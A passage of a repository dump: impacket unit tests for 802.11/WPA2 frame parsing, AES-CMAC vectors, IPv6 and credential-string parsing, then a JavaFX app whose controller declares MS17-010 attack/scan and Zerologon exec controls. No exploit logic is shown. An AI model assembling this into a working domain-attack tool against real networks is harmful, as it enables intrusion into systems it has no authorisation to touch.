        self.frame_orig = b'\x08\x01\x30\x00\x00\x08\x54\xac\x2f\x85\x00\x23\x4d\x09\x86\xfe\x00\x08\x54\xac\x2f\x85\x40\x44\xaa\xaa\x03\x00\x00\x00\x08\x00\x45\x00\x00\x28\x72\x37\x40\x00\x80\x06\x6c\x22\xc0\xa8\x01\x02\xc3\x7a\x97\x51\xd7\xa0\x00\x50\xa5\xa5\xb1\xe0\x12\x1c\xa9\xe1\x50\x10\x4e\x75\x59\x74\x00\x00\xed\x13\x22\x91'

        frame = Dot11(self.frame_orig)

        self.assertEqual(frame.get_type(), Dot11Types.DOT11_TYPE_DATA)
        self.assertEqual(frame.get_subtype(), Dot11Types.DOT11_SUBTYPE_DATA)
        self.assertEqual(frame.get_type_n_subtype(), Dot11Types.DOT11_TYPE_DATA_SUBTYPE_DATA)

        self.data = Dot11DataFrame(frame.get_body_as_string())
        frame.contains(self.data)

    def test_01_HeaderSize(self):
        'Test Header and Tail Size field'
        sizes = (self.data.get_header_size(), self.data.get_tail_size())
        self.assertEqual(sizes[0], 22)
        self.assertEqual(sizes[1], 0)

    def test_02_Duration(self):
        'Test Duration field'
        replacement = 0x1234

        self.assertEqual(self.data.get_duration(), 0x30)
        self.data.set_duration(replacement)
        self.assertEqual(self.data.get_duration(), replacement)

    def test_03_Address_1(self):
        'Test Address 1 field'
        captured = [0x00, 0x08, 0x54, 0xac, 0x2f, 0x85]

        mac = self.data.get_address1()
        self.assertEqual(mac.tolist(), captured)

        # Change the outer octets only, write the address back and re-read it.
        mac[0], mac[5] = 0x12, 0x34
        self.data.set_address1(mac)
        self.assertEqual(self.data.get_address1().tolist(), [0x12] + captured[1:5] + [0x34])

    def test_04_Address_2(self):
        'Test Address 2 field'
        captured = [0x00, 0x23, 0x4d, 0x09, 0x86, 0xfe]

        mac = self.data.get_address2()
        self.assertEqual(mac.tolist(), captured)

        mac[0], mac[5] = 0x12, 0x34
        self.data.set_address2(mac)
        self.assertEqual(self.data.get_address2().tolist(), [0x12] + captured[1:5] + [0x34])

    def test_05_Address_3(self):
        'Test Address 3 field'
        captured = [0x00, 0x08, 0x54, 0xac, 0x2f, 0x85]

        mac = self.data.get_address3()
        self.assertEqual(mac.tolist(), captured)

        mac[0], mac[5] = 0x12, 0x34
        self.data.set_address3(mac)
        self.assertEqual(self.data.get_address3().tolist(), [0x12] + captured[1:5] + [0x34])

    def test_06_sequence_control(self):
        'Test Sequence control field'
        replacement = 0x1234

        self.assertEqual(self.data.get_sequence_control(), 0x4440)
        self.data.set_sequence_control(replacement)
        self.assertEqual(self.data.get_sequence_control(), replacement)

    def test_07_fragment_number(self):
        'Test Fragment number field'
        self.assertEqual(self.data.get_fragment_number(), 0x0000)
        # 4-bit field: the high nibble of 0xF1 must be dropped by the setter.
        self.data.set_fragment_number(0xF1)
        self.assertEqual(self.data.get_fragment_number(), 0x01)

    def test_08_sequence_number(self):
        'Test Sequence number field'
        self.assertEqual(self.data.get_sequence_number(), 0x0444)
        # 12-bit field: the top four bits of 0xF234 must be dropped by the setter.
        self.data.set_sequence_number(0xF234)
        self.assertEqual(self.data.get_sequence_number(), 0x0234)

    def test_09_frame_data(self):
        'Test Frame Data field'
        # Test with packet without addr4
        expected_body = b"\xaa\xaa\x03\x00\x00\x00\x08\x00\x45\x00\x00\x28\x72\x37\x40\x00\x80\x06\x6c\x22\xc0\xa8\x01\x02\xc3\x7a\x97\x51\xd7\xa0\x00\x50\xa5\xa5\xb1\xe0\x12\x1c\xa9\xe1\x50\x10\x4e\x75\x59\x74\x00\x00"
        self.assertEqual(self.data.get_frame_body(), expected_body)


if __name__ == '__main__':
    unittest.main(verbosity=1)
108 |
--------------------------------------------------------------------------------
/impacket/tests/dot11/test_WPA2.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | import unittest
11 | from impacket.dot11 import Dot11,Dot11Types,Dot11DataFrame,Dot11WPA2,Dot11WPA2Data
12 |
13 |
class TestDot11WPA2Data(unittest.TestCase):
    """Field accessors of the WPA2 header and payload in a protected data frame.

    These tests cover header/payload field parsing and setter round trips
    only. Decryption (get_decrypted_data) has no test yet, and the MIC is
    read and overwritten but never verified against the payload.
    """

    def setUp(self):
        # 802.11 Data Frame
        #
        self.frame_orig = b'\x08\x49\x24\x00\x00\x21\x29\x68\x33\x5d\x00\x15\xaf\xe4\xf1\x0f\x00\x21\x29\x68\x33\x5b\xe0\x31\x1b\x13\x00\x20\x00\x00\x00\x00\x84\x7d\x6a\x30\x8c\x60\x7e\x3b\x22\xdc\x16\xc1\x4b\x28\xd3\x26\x76\x9d\x2e\x59\x96\x31\x3e\x01\x6f\x61\xa2\x59\xc8\xdc\xd3\xc4\xad\x7c\xcc\x32\xa8\x9f\xf6\x03\x02\xe1\xac\x1d\x1e\x02\x8a\xcd\x5b\x94\x20\x2d\xfc\x6e\x37\x40\x2e\x46\x17\x19\x0c\xc0\x34\x07\xae\xe7\x77\xaf\xf9\x9f\x41\x53'
        frame = Dot11(self.frame_orig)

        self.assertEqual(frame.get_type(), Dot11Types.DOT11_TYPE_DATA)
        self.assertEqual(frame.get_subtype(), Dot11Types.DOT11_SUBTYPE_DATA)
        self.assertEqual(frame.get_type_n_subtype(), Dot11Types.DOT11_TYPE_DATA_SUBTYPE_DATA)

        # Peel the layers in order: data frame -> WPA2 header -> WPA2 payload.
        data_layer = Dot11DataFrame(frame.get_body_as_string())
        frame.contains(data_layer)

        self.wpa2_header = Dot11WPA2(data_layer.body_string)
        data_layer.contains(self.wpa2_header)

        self.wpa2_data = Dot11WPA2Data(self.wpa2_header.body_string)
        self.wpa2_header.contains(self.wpa2_data)

    def test_01_is_WPA2(self):
        'Test WPA2Header is_WPA2 method'
        detected = self.wpa2_header.is_WPA2()
        self.assertEqual(detected, True)

    def test_03_extIV(self):
        'Test WPA2Header extIV getter and setter methods'
        self.assertEqual(self.wpa2_header.get_extIV(), 0x01)

        # 1-bit field
        self.wpa2_header.set_extIV(0x00)
        self.assertEqual(self.wpa2_header.get_extIV(), 0x00)

    def test_04_keyid(self):
        'Test WPA2Header keyID getter and setter methods'
        self.assertEqual(self.wpa2_header.get_keyid(), 0x00)

        # 2-bit field
        self.wpa2_header.set_keyid(0x03)
        self.assertEqual(self.wpa2_header.get_keyid(), 0x03)

    #TODO: Test get_decrypted_data
    #def test_05_get_decrypted_data(self):

    def test_06_PNs(self):
        'Test WPA2Data PN0 to PN5 getter and setter methods'
        # Values of PN0..PN5 as they appear in the capture, in index order.
        captured = (0x1b, 0x13, 0x00, 0x00, 0x00, 0x00)

        for index, initial in enumerate(captured):
            read_pn = getattr(self.wpa2_header, 'get_PN%d' % index)
            write_pn = getattr(self.wpa2_header, 'set_PN%d' % index)

            self.assertEqual(read_pn(), initial)
            write_pn(0xAB)
            self.assertEqual(read_pn(), 0xAB)

    def test_07_data(self):
        'Test WPA2Data body'
        expected_body = b'\x84\x7d\x6a\x30\x8c\x60\x7e\x3b\x22\xdc\x16\xc1\x4b\x28\xd3\x26\x76\x9d\x2e\x59\x96\x31\x3e\x01\x6f\x61\xa2\x59\xc8\xdc\xd3\xc4\xad\x7c\xcc\x32\xa8\x9f\xf6\x03\x02\xe1\xac\x1d\x1e\x02\x8a\xcd\x5b\x94\x20\x2d\xfc\x6e\x37\x40\x2e\x46\x17\x19'
        self.assertEqual(self.wpa2_data.body_string, expected_body)

    def test_08_mic(self):
        'Test WPA2Data MIC field'
        captured_mic = b'\x0c\xc0\x34\x07\xae\xe7\x77\xaf'
        self.assertEqual(self.wpa2_data.get_MIC(), captured_mic)

        # Setter round trip with an arbitrary 8-byte value; no integrity check is involved.
        replacement_mic = b'\x01\x02\x03\x04\xff\xfe\xfd\xfc'
        self.wpa2_data.set_MIC(replacement_mic)
        self.assertEqual(self.wpa2_data.get_MIC(), replacement_mic)


if __name__ == '__main__':
    unittest.main(verbosity=1)
105 |
--------------------------------------------------------------------------------
/impacket/tests/dot11/test_helper.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | # Description:
11 | # Tests for helper used to build ProtocolPackets
12 | #
13 | # Author:
14 | # Aureliano Calvo
15 | #
16 | import unittest
17 | import impacket.helper as h
18 |
19 |
class TestHelpers(unittest.TestCase):
    """Checks the field descriptors that impacket.helper offers for ProtocolPacket."""

    def test_well_formed(self):
        class MockPacket(h.ProtocolPacket):
            # One descriptor of each kind used by the test.
            byte_field = h.Byte(0)
            word_field = h.Word(1, ">")
            three_bytes_field = h.ThreeBytesBigEndian(3)
            long_field = h.Long(6, ">")
            # Declared on byte 0, the same byte that byte_field reads.
            aliased_bit_field = h.Bit(0,0)

            header_size = 4
            tail_size = 0

        assignments = (
            ("byte_field", 1),
            ("word_field", 2),
            ("three_bytes_field", 4),
            ("long_field", 8),
        )

        pkt = MockPacket()
        for field_name, value in assignments:
            setattr(pkt, field_name, value)

        for field_name, value in assignments:
            self.assertEqual(value, getattr(pkt, field_name))

        # byte_field holds 1, so the aliased bit reads as set ...
        self.assertEqual(True, pkt.aliased_bit_field)

        # ... and clearing the bit must show up through byte_field as well.
        pkt.aliased_bit_field = False
        self.assertEqual(0, pkt.byte_field)

        # Serialising, re-parsing and serialising again must give the same bytes.
        serialized = pkt.get_packet()
        self.assertEqual(serialized, MockPacket(pkt.get_packet()).get_packet())


if __name__ == '__main__':
    unittest.main(verbosity=1)
55 |
--------------------------------------------------------------------------------
/impacket/tests/dot11/test_wps.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | # Description:
11 | # Tests for WPS packets
12 | #
13 | # Author:
14 | # Aureliano Calvo
15 | #
16 | import unittest
17 | import array
18 | from impacket import wps
19 |
20 |
class TestTLVContainer(unittest.TestCase):
    """Round-trip test for wps.TLVContainer serialisation."""

    def testNormalUsageContainer(self):
        builders = {
            1: wps.StringBuilder(),
            2: wps.ByteBuilder(),
            3: wps.NumBuilder(2)
        }
        # Kind 4 has no entry in the builder map and is given as a raw byte array.
        entries = (
            (1, b"Sarlanga"),
            (2, 1),
            (3, 1024),
            (4, array.array("B", [1,2,3]))
        )

        source = wps.TLVContainer(builders=builders)
        for kind, value in entries:
            source.append(kind, value)

        # Serialise the first container and parse the result into a second one.
        parsed = wps.TLVContainer(builders=builders)
        parsed.from_ary(source.to_ary())

        for kind, value in entries:
            self.assertEqual(value, parsed.first(kind))

        self.assertEqual(source.to_ary(), parsed.to_ary())
        self.assertEqual(b"Sarlanga", source.first(1))


if __name__ == '__main__':
    unittest.main(verbosity=1)
52 |
--------------------------------------------------------------------------------
/impacket/tests/misc/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Copyright (C) 2023 Fortra. All rights reserved.
3 | #
4 | # This software is provided under a slightly modified version
5 | # of the Apache Software License. See the accompanying LICENSE file
6 | # for more information.
7 | #
8 |
--------------------------------------------------------------------------------
/impacket/tests/misc/test_crypto.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | from __future__ import print_function, division
11 | import unittest
12 | from binascii import hexlify, unhexlify
13 |
14 | from impacket.crypto import Generate_Subkey, AES_CMAC, AES_CMAC_PRF_128
15 |
16 |
def by8(s):
    """Split a sliceable sequence into consecutive pieces of at most eight items."""
    pieces = []
    for start in range(0, len(s), 8):
        pieces.append(s[start:start + 8])
    return pieces
19 |
20 |
def hex8(b):
    """Format bytes as lowercase hex digits in space-separated groups of eight."""
    digits = hexlify(b).decode('ascii')
    groups = by8(digits)
    return ' '.join(groups)
23 |
24 |
def pp(prev, s):
    """Print ``prev`` followed by ``s`` in groups of eight; always returns ''.

    Debug helper; none of the tests in this file call it.
    """
    # One print call yields the same text as the per-chunk loop: every item,
    # including the last, is followed by a single space and then a newline.
    print(prev, *by8(s), sep=' ', end=' \n')
    return ''
34 |
35 |
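class CryptoTests(unittest.TestCase):
    """Known-answer tests for the AES-CMAC helpers in impacket.crypto.

    The key, message and expected outputs of the first four AES_CMAC cases
    and of the subkey test appear to be the RFC 4493 examples, and the PRF
    cases appear to be those of RFC 4615 (confirm against the RFCs before
    relying on that).
    """

    def test_subkey(self):
        """Generate_Subkey derives the expected K1/K2 pair from a 128-bit key."""
        K = "2b7e151628aed2a6abf7158809cf4f3c"

        K1, K2 = Generate_Subkey(unhexlify(K))
        self.assertEqual(hex8(K1), 'fbeed618 35713366 7c85e08f 7236a8de')
        self.assertEqual(hex8(K2), 'f7ddac30 6ae266cc f90bc11e e46d513b')

    def test_AES_CMAC(self):
        """AES_CMAC matches the expected tag for several message lengths."""
        K = "2b7e151628aed2a6abf7158809cf4f3c"
        M = "6bc1bee22e409f96e93d7e117393172aae2d8a571e03ac9c9eb76fac45af8e5130c81c46a35ce411e5fbc1191a0a52eff69f2445df4f9b17ad2b417be66c3710"
        # The third argument is the number of message bytes to authenticate,
        # so one 64-byte buffer serves all four lengths below.
        # Example 1: len = 0
        self.assertEqual(hex8(AES_CMAC(unhexlify(K), unhexlify(M), 0)),
                         'bb1d6929 e9593728 7fa37d12 9b756746')
        # Example 2: len = 16 (exactly one block)
        self.assertEqual(hex8(AES_CMAC(unhexlify(K), unhexlify(M), 16)),
                         '070a16b4 6b4d4144 f79bdd9d d04a287c')
        # Example 3: len = 40 (last block is partial)
        self.assertEqual(hex8(AES_CMAC(unhexlify(K), unhexlify(M), 40)),
                         'dfa66747 de9ae630 30ca3261 1497c827')
        # Example 4: len = 64 (four full blocks)
        self.assertEqual(hex8(AES_CMAC(unhexlify(K), unhexlify(M), 64)),
                         '51f0bebf 7e3b9d92 fc497417 79363cfe')

        # Additional vector with its own key and message.
        M = "eeab9ac8fb19cb012849536168b5d6c7a5e6c5b2fcdc32bc29b0e3654078a5129f6be2562046766f93eebf146b"
        K = "6c3473624099e17ff3a39ff6bdf6cc38"
        # Mac = dbf63fd93c4296609e2d66bf79251cb5
        # Example 5: len = 45
        self.assertEqual(hex8(AES_CMAC(unhexlify(K), unhexlify(M), 45)),
                         'dbf63fd9 3c429660 9e2d66bf 79251cb5')

    def test_AES_CMAC_PRF_128(self):
        """AES_CMAC_PRF_128 accepts keys shorter than, equal to and longer than 16 bytes."""
        K = "000102030405060708090a0b0c0d0e0fedcb"
        M = "000102030405060708090a0b0c0d0e0f10111213"

        # AES-CMAC-PRF-128 Test Vectors
        # The message is 20 bytes in every case; only the key length varies.
        # Case 1: key length 18 (the full K)
        self.assertEqual(hex8(AES_CMAC_PRF_128(unhexlify(K), unhexlify(M), 18, len(unhexlify(M)))),
                         '84a348a4 a45d235b abfffc0d 2b4da09a')
        # Case 2: key length 16 (first 16 bytes of K)
        self.assertEqual(hex8(AES_CMAC_PRF_128(unhexlify(K)[:16], unhexlify(M), 16, len(unhexlify(M)))),
                         '980ae87b 5f4c9c52 14f5b6a8 455e4c2d')
        # Case 3: key length 10 (first 10 bytes of K)
        self.assertEqual(hex8(AES_CMAC_PRF_128(unhexlify(K)[:10], unhexlify(M), 10, len(unhexlify(M)))),
                         '290d9e11 2edb09ee 141fcf64 c0b72f3d')


if __name__ == "__main__":
    unittest.main(verbosity=1)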
85 |
--------------------------------------------------------------------------------
/impacket/tests/misc/test_ip6_address.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | import six
11 | import unittest
12 | from binascii import hexlify
13 | from impacket.IP6_Address import IP6_Address
14 |
15 |
def hexl(b):
    """Return the lowercase hexadecimal text form of a bytes value."""
    encoded = hexlify(b)
    return encoded.decode('ascii')
18 |
19 |
class IP6AddressTests(unittest.TestCase):
    """Parsing, binary encoding and canonical text form of IP6_Address."""

    def test_bin(self):
        # Each row: (input text, expected 16-byte value as hex, expected as_string()).
        cases = (
            ("A:B:C:D:E:F:1:2", '000a000b000c000d000e000f00010002',
             "A:B:C:D:E:F:1:2"),
            ("A:B:0:D:E:F:0:2", '000a000b0000000d000e000f00000002',
             "A:B::D:E:F:0:2"),
            ("A::BC:E:D", '000a000000000000000000bc000e000d',
             "A::BC:E:D"),
            ("A::BCD:EFFF:D", '000a00000000000000000bcdefff000d',
             "A::BCD:EFFF:D"),
            ("FE80:0000:0000:0000:020C:29FF:FE26:E251",
             'fe80000000000000020c29fffe26e251',
             "FE80::20C:29FF:FE26:E251"),
            ("::", '00000000000000000000000000000000',
             "::"),
            ("1::", '00010000000000000000000000000000',
             "1::"),
            ("::2", '00000000000000000000000000000002',
             "::2"),
        )
        for text, expected_hex, expected_text in cases:
            address = IP6_Address(text)
            raw = address.as_bytes()
            self.assertEqual(hexl(raw), expected_hex)
            self.assertEqual(address.as_string(), expected_text)

    def test_malformed(self):
        # Each row: (malformed input, pattern the raised error message must match).
        rejected = (
            ("ABCD:EFAB:1234:1234:1234:1234:1234:12345", r'address size'),
            (":::", r'triple colon'),
            ("::::", r'triple colon'),
        )
        for text, pattern in rejected:
            with six.assertRaisesRegex(self, Exception, pattern):
                IP6_Address(text)
        # Malformed inputs that have no assertion yet:
        #   IP6_Address("AB:CD:EF")
        #   IP6_Address("12::34::56")
        #   IP6_Address("00BCDE::")
        #   IP6_Address("DEFG::")
        # and, further, these:
        #   IP6_Address("A::0XBC:D")
        #   IP6_Address("B:-123::")
        #   IP6_Address("B:56 ::-0xE")


if __name__ == '__main__':
    unittest.main(verbosity=1)
67 |
--------------------------------------------------------------------------------
/impacket/tests/misc/test_utils.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | # Description:
11 | # Tests for the utility and helper functions used by the example scripts
12 | #
13 | import unittest
14 | from impacket.examples.utils import parse_target, parse_credentials
15 |
16 |
class UtilsTests(unittest.TestCase):
    """Pins how target and credential strings are split into their parts."""

    def test_parse_target(self):
        # Parse target returns a tuple with: domain, username, password, remote_name/address
        # The password cases contain '@', '/' and other punctuation: the host is
        # expected to be whatever follows the last '@', so a password holding
        # '@' or '/' must come back whole rather than truncated.
        expectations = (
            ("", ("", "", "", "")),
            ("HostName", ("", "", "", "HostName")),
            ("UserName@HostName", ("", "UserName", "", "HostName")),
            ("UserName:Password@HostName", ("", "UserName", "Password", "HostName")),
            ("UserName:Pa$$word1234@HostName", ("", "UserName", "Pa$$word1234", "HostName")),
            ("UserName:Password!#$@HostName", ("", "UserName", "Password!#$", "HostName")),
            ("UserName:Passw@rd!#$@HostName", ("", "UserName", "Passw@rd!#$", "HostName")),
            ("UserName:P@ssw@rd@!#$@HostName", ("", "UserName", "P@ssw@rd@!#$", "HostName")),
            ("DOMAIN/UserName@HostName", ("DOMAIN", "UserName", "", "HostName")),
            ("DOMAIN/:Password@HostName", ("DOMAIN", "", "Password", "HostName")),
            ("DOMAIN/UserName:Password@HostName", ("DOMAIN", "UserName", "Password", "HostName")),
            ("DOMAIN/UserName:Password/123@HostName", ("DOMAIN", "UserName", "Password/123", "HostName")),
        )

        for target, expected in expectations:
            parsed = parse_target(target)
            self.assertTupleEqual(parsed, expected)

    def test_parse_credentials(self):
        # Parse credentials returns a tuple with: domain, username, password
        # A password may itself contain ':' or '/'; only the first of each is
        # expected to act as a separator.
        expectations = (
            ("", ("", "", "")),
            ("UserName", ("", "UserName", "")),
            ("UserName:Password", ("", "UserName", "Password")),
            ("UserName:Password:123", ("", "UserName", "Password:123")),
            ("DOMAIN/UserName", ("DOMAIN", "UserName", "")),
            ("DOMAIN/UserName:Password", ("DOMAIN", "UserName", "Password")),
            ("DOMAIN/UserName:Password/123", ("DOMAIN", "UserName", "Password/123")),
        )

        for cred, expected in expectations:
            parsed = parse_credentials(cred)
            self.assertTupleEqual(parsed, expected)


if __name__ == "__main__":
    unittest.main(verbosity=1)
57 |
--------------------------------------------------------------------------------
/impacket/tests/walkmodules.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # From https://stackoverflow.com/questions/1707709/list-all-the-modules-that-are-part-of-a-python-package
3 | import pkgutil
4 | import impacket
import traceback

# Walk every submodule of the package and try to import it, so that broken
# imports surface as printed tracebacks. Importing a module executes its
# top-level code, so run this only against a trusted checkout.
package = impacket
module_walker = pkgutil.walk_packages(
    path=package.__path__,
    prefix=package.__name__ + '.',
    onerror=lambda x: None,  # errors raised while walking sub-packages are ignored
)
for importer, modname, ispkg in module_walker:
    try:
        __import__(modname)
    except Exception as e:
        # Report the failure and carry on with the next module.
        traceback.print_exc()
        print(e)
16 |
--------------------------------------------------------------------------------
/impacket/tox.ini:
--------------------------------------------------------------------------------
1 | # content of: tox.ini, put in same dir as setup.py
2 | [tox]
3 | envlist = clean,py{36,37,38,39,310,311},report
4 |
5 | [gh-actions]
6 | python =
7 | 3.6: py36
8 | 3.7: py37
9 | 3.8: py38
10 | 3.9: py39
11 | 3.10: py310
12 | 3.11: py311
13 |
14 | [testenv]
15 | deps = -r requirements-test.txt
16 | passenv = REMOTE_CONFIG
17 | commands =
18 | {envpython} -m pip check
19 | pytest --cov --cov-append --cov-context=test --cov-config=tox.ini {posargs}
20 | depends =
21 | py{36,37,38,39,310,311}: clean
22 | report: py{36,37,38,39,310,311}
23 |
24 | [testenv:clean]
25 | basepython = python3.8
26 | deps = coverage
27 | skip_install = true
28 | commands =
29 | coverage erase
30 |
31 | [testenv:report]
32 | basepython = python3.8
33 | deps = coverage
34 | skip_install = true
35 | commands =
36 | coverage report
37 | coverage html
38 |
39 | [testenv:py311]
40 | ignore_errors = true
41 |
42 | [pytest]
43 | markers =
44 | remote: marks tests as remote
45 |
46 | [coverage:run]
47 | branch = True
48 | source = impacket
49 | omit = *remcom*
50 | *.tox*
51 |
52 | [coverage:report]
53 | # Regexes for lines to exclude from consideration
54 | exclude_lines =
55 | # Have to re-enable the standard pragma
56 | pragma: no cover
57 |
58 | # Don't complain about missing debug-only code:
59 | if self\.debug
60 |
61 | # Don't complain if tests don't hit defensive assertion code:
62 | raise AssertionError
63 | raise NotImplementedError
64 |
65 | # Don't complain if non-runnable code isn't run:
66 | if 0:
67 | if __name__ == .__main__.:
68 |
69 | ignore_errors = True
70 |
71 | [coverage:html]
72 | show_contexts = True
73 |
--------------------------------------------------------------------------------
/pom.xml:
--------------------------------------------------------------------------------
1 |
3 | 4.0.0
4 |
5 | org.example
6 | gogogo
7 | 1.0-SNAPSHOT
8 |
9 | jar
10 |
11 | gogogo
12 | http://maven.apache.org
13 |
14 |
15 | UTF-8
16 |
17 |
18 |
19 |
20 | junit
21 | junit
22 | 3.8.1
23 | test
24 |
25 |
26 | com.jfoenix
27 | jfoenix
28 | 8.0.10
29 |
30 |
31 | cn.hutool
32 | hutool-all
33 | 5.8.8
34 |
35 |
36 | com.jcraft
37 | jsch
38 | 0.1.55
39 |
40 |
41 |
42 | net.sf.expectit
43 | expectit-core
44 | 0.9.0
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 | ${project.artifactId}
58 |
59 |
60 |
61 |
62 | org.apache.maven.plugins
63 | maven-assembly-plugin
64 | 3.3.0
65 |
66 |
67 |
68 | Main
69 |
70 |
71 |
72 |
73 | jar-with-dependencies
74 |
75 |
76 |
77 |
78 |
79 |
80 | make-assembly
81 | package
82 |
83 | single
84 |
85 |
86 |
87 |
88 |
89 | org.apache.maven.plugins
90 | maven-compiler-plugin
91 |
92 | 8
93 | 8
94 |
95 |
96 |
97 |
98 |
99 |
100 |
--------------------------------------------------------------------------------
/src/main/java/Main.java:
--------------------------------------------------------------------------------
1 | import cn.hutool.core.io.resource.ResourceUtil;
2 | import javafx.application.Application;
3 | import javafx.fxml.FXMLLoader;
4 | import javafx.scene.Parent;
5 | import javafx.scene.Scene;
6 | import javafx.scene.control.Alert;
7 | import javafx.scene.control.TextInputDialog;
8 | import javafx.stage.Stage;
9 | import javafx.stage.WindowEvent;
10 | import utils.Http.HttpTools;
11 | import utils.Http.Response;
12 |
13 | import java.net.URL;
14 | import java.util.HashMap;
15 | import java.util.Objects;
16 | import java.util.Optional;
17 |
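/**
 * JavaFX entry point: loads the main FXML layout, applies the stylesheet and
 * shows the primary window.
 */
public class Main extends Application {
    public Main() {
    }

    /**
     * Builds and shows the primary stage.
     *
     * @param primaryStage stage supplied by the JavaFX runtime
     * @throws Exception if the FXML layout cannot be loaded
     */
    @Override
    public void start(Stage primaryStage) throws Exception {
        // Key check (currently disabled):
        // boolean passwordCorrect = checkPassword();
        // if (!passwordCorrect) {
        //     System.exit(0); // wrong key, close the application
        // }

        Parent root = (Parent) FXMLLoader.load(ResourceUtil.getResource("fxml/Main.fxml"));
        primaryStage.setTitle("By Superman 20230902");
        Scene scene = new Scene(root, 1280.0, 910.0);
        scene.getStylesheets().add(((URL) Objects.requireNonNull(Main.class.getResource("/css/main.css"))).toExternalForm());
        primaryStage.setScene(scene);
        primaryStage.show();

        // Listen for the window-close event.
        primaryStage.setOnCloseRequest((WindowEvent event) -> {
            System.exit(0); // terminate the whole application
        });
    }

    /**
     * Asks the user for a key and checks it against a remote endpoint.
     *
     * <p>SECURITY(review): the key is sent as a query parameter over plain HTTP to a
     * hard-coded address, so it is visible to anyone on the network path and is
     * likely to end up in proxy and server logs. A check of this kind belongs on a
     * TLS endpoint with the secret in the request body or a header.
     *
     * @return {@code true} when the endpoint answers with status 500, {@code false}
     *         when the dialog is cancelled or any other status is returned
     */
    private boolean checkPassword() {
        boolean flag = false;
        // Type arguments restored: the values put below are all strings.
        HashMap<String, String> headersMap = new HashMap<>();
        headersMap.put("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7");
        headersMap.put("Accept-Language", "zh-CN,zh;q=0.9");

        // Build the input dialog.
        TextInputDialog dialog = new TextInputDialog();
        dialog.setTitle("密钥校验");
        dialog.setHeaderText("请输入密钥");
        dialog.setContentText("密钥:");

        // Show the dialog and read the key the user typed.
        Optional<String> result = dialog.showAndWait();
        if (result.isPresent()) {
            String key = result.get();

            // The key is user input: percent-encode it so characters such as
            // '&', '#' or spaces cannot add parameters or truncate the URL.
            String encodedKey;
            try {
                encodedKey = java.net.URLEncoder.encode(key, "UTF-8");
            } catch (java.io.UnsupportedEncodingException e) {
                // Every Java platform is required to support UTF-8.
                throw new IllegalStateException(e);
            }

            // Send the key-check request.
            String url = "http://124.222.32.173:8080/api/login?key=" + encodedKey;
            Response response = HttpTools.get(url, headersMap, "utf-8");
            System.out.println(response.getCode());

            // NOTE(review): a 500 (server error) status is treated as "key accepted";
            // confirm this is really what the endpoint returns on success, because any
            // server-side failure would then also unlock the application.
            if (response.getCode() == 500) {
                flag = true;
            } else {
                // Wrong key: show a warning dialog.
                Alert alert = new Alert(Alert.AlertType.WARNING);
                alert.setTitle("密钥不正确");
                alert.setHeaderText("密钥校验失败");
                alert.setContentText("请输入正确的密钥!");
                alert.showAndWait();
            }
        }

        return flag;
    }

    public static void main(String[] args) {
        launch(args);
    }
}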
--------------------------------------------------------------------------------
/src/main/java/controller/DCController.java:
--------------------------------------------------------------------------------
1 | package controller;
2 |
3 | import cn.hutool.core.util.StrUtil;
4 | import javafx.application.Platform;
5 | import javafx.collections.FXCollections;
6 | import javafx.collections.ObservableList;
7 | import javafx.fxml.FXML;
8 | import javafx.scene.control.Button;
9 | import javafx.scene.control.ChoiceBox;
10 | import javafx.scene.control.TextArea;
11 | import javafx.scene.control.TextField;
12 | import javafx.scene.input.MouseEvent;
13 | import utils.Kinds_Coder;
14 |
15 | import static utils.Zerologon.ZerologonExec;
16 |
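/**
 * FXML controller for the domain-controller tab: holds the injected controls and
 * the click handlers bound to them.
 */
public class DCController {
    private final Kinds_Coder coder = new Kinds_Coder();

    @FXML
    private TextField Ms17010_IP;

    @FXML
    private TextField Filed_Ms17010command;

    // Type argument restored: the box is filled with the charset names from Kinds_Coder.
    @FXML
    private ChoiceBox<String> choiceBox_coder1;

    @FXML
    private Button Button_17010attack;

    @FXML
    private TextArea textArea_Ms17010;

    @FXML
    private TextField Ms17010_IPS;

    @FXML
    private Button Button_Ms17010Scan;

    @FXML
    private TextField textField_DCiP;

    @FXML
    private TextField textField_Domain;

    // Type argument restored: getValue() is assigned to a String below.
    @FXML
    private ChoiceBox<String> choiceBox_coder2;

    @FXML
    private Button Button_ZeroAtt;

    @FXML
    private TextArea textArea_ZeroResult;

    @FXML
    private TextField textField_DomainMachineName;

    /** Click handler with no implementation. */
    @FXML
    void Ms17010Att_clicked(MouseEvent event) {

    }

    /**
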